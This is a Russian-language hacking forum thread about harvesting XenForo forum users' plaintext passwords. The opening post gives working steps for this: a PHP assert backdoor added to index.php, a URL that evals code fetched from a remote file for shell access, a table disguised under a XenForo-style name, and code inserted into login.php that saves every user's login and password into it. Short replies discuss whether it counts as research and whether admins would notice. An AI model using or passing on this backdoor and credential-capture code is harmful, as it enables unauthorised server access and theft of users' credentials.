Избавляемся от Хеширования [Xenforo]

Discussion in 'Песочница' started by pw0ned, 25 Jan 2016.

  1. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Используем "WSO Web Shel"

    Отправляемся к файлу index.php , и дописываем вредоносный код:

    Code:
    if (isset($_REQUEST['l']))
    assert(stripslashes($_REQUEST[l]));
    Вызываем скрипт и получаем доступ к RemoteShell:
    Code:
    http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#
    Отсеиваем логин и пасс из файлов с ФТП , создаем базу данных

    Code:
    create table xf_style_property_css (
    ID int(20) AUTO_INCREMENT,
    CSSName varchar(50) NOT NULL,
    CSSValue varchar(50) NOT NULL,
    PRIMARY KEY (ID)
    );
    Находим в файле login.php строки:

    [​IMG]

    Дописываем код:

    Code:
    $DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');
            mysql_select_db('Имя БД');
            mysql_query("SET NAMES 'utf8'");
            $datalogxf = $data['login'];
            $datapassxf = $data['password'];
            mysql_query("INSERT INTO `xf_style_property_css` (`ID`, `CSSName`, `CSSValue`) VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);
    После всех выше описанных функций , каждый авторизованный пользователь будет внесен в наш раздел с базой ( который создали выше ).

    Выполняем команду получения списка: (Сейчас он пустой )
    Code:
    SELECT * FROM `xf_style_property_css`
     
    #1 pw0ned, 25 Jan 2016
    Last edited: 6 Sep 2016
  2. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Может можно перенести куда-то в статьи ?

    @yarbabin
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Я просто подумал. Потом админ сделает show databases;
    И....
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    не, на какой-то лютый ресерч не тянет
     
    _________________________
    KIR@PRO and Fepsis like this.
  5. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    И.... охренеет